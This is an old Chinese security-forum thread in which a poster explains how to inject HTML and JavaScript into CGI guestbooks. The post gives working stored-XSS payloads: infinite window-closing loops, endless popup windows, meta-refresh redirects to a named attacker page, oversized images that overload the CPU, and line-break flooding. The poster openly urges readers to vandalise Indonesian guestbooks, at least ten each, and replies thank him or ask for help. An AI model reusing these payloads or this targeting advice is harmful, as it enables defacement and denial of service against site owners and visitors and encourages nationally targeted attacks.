20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 简单的黑留言板的方法

   
作者 标题: 简单的黑留言板的方法
悟休
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
首先我们得简单了解一下留言板CGI程序的原理:

CGI是把访客输入的留言变为一个变量,然后再把这个变量插入到显示留言的HTML文件里。
访客输入的文本如要在HTML文件里显示就得符合HTML标准,而CGI程序里一般都加入了特定的HTML语言。
当访客输入内容(变量X),插入HTML文件时,即同时插入到了头尾HTML语句中:

<font> 访客输入的变量X </font>
(当它插入到HTML文件时就显示了给内容〕

但如果我们把它给敝屏了,就可以.....做很多事情了。

如我们输入时打上:

</font> 符合HTML标准的语句 <font>
(前后的</font><font>是用来敝屏CGI中的HTML语句用的)

插入到HTML文件里的就变成了:

<font></font> 符合HTML标准的语句 <font></font>

比如,你想在留言板里显示一张图片,输入:

</font>

<a href="http://页面链接位置"></a></p><font>

你也可以输入JAVASCRIPT的语句,做一些你想做的事:

1.弄个死循环在上面,让他的浏览器死掉。可以这样输入:

<a href="http://XXX" onMouseover="while(1){window.close('/')}">

或<a herf="" onMousever="while(ture){window.close('/')}">

2.也可叫他打开指定的窗口:

<img src="javascript:n=1;do{window.open('http://指定的页')}while(n==2)" width="1">
或<meta http-equirv="refresh" content="1;url=http://你指定的页">

其中,1是指定的时间间隔。即当页面被查阅时,浏览器在给定的时间间隔内重新装载你指定的页。

3.或叫他打开无数个浏览器窗口:

<img src="javascript:n=1;do{window.open('')}while(n==1)" width="1">

4.或弄张超级巨无霸的图片让他的CPU超负荷:

<img src="" width="1" height="100000000000000000000000000"></a></p>

上面的几招是我昨天在印尼站点上逛时用的本方法。
很爽的,让它开N个窗口,或让它跳到一些XXX站点,(在次我已经做了一个样本页,大家在黑印尼时可以用这个地址来重新载入http://chaonima.yeah.net )随你喜欢。
千万别来拿自己人开刀。你可以到印尼那去做你的实验,你会给他们一个惊喜的。
在输入完之后,最好检查一下你的作品,不要怕它跳到哪个不知名的站点,也不要怕浏览器死了,
更不要怕被开很多窗口(你可关了JAVA),你看到自己的成绩会很开心的。

5.大家不知知到
换行符号吗!对了用复制法!输一千个
给他!就可以炸了它!

怕找不到站点的话,可以到YAHOO上去查。输入 indonesia's guestbook ,哇塞,31万多的站点,任你发挥了,至少也要干他个10个以上。要看清楚喔!!!
当然,也有不是印尼站点的或不支持HTML语句的。我看过印尼人好象挺西欢用HTML的留言板的!强列要求大家去黑他们的娱乐网!

[被 NetDemon 编辑过(日期 01-03-2001)]

IP: 已记录
xinzhihuoyan
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
效果不错,谢谢楼上的大哥

------------------
我轻轻地走,正如我轻轻的来。

IP: 已记录
wake
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
我想知道的是怎么样
把HTML语句插入源文件当中
因为我没有受过专业教育请原谅!
还有怎样查清楚对方有没有开CGI程序呢?
拜托!
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。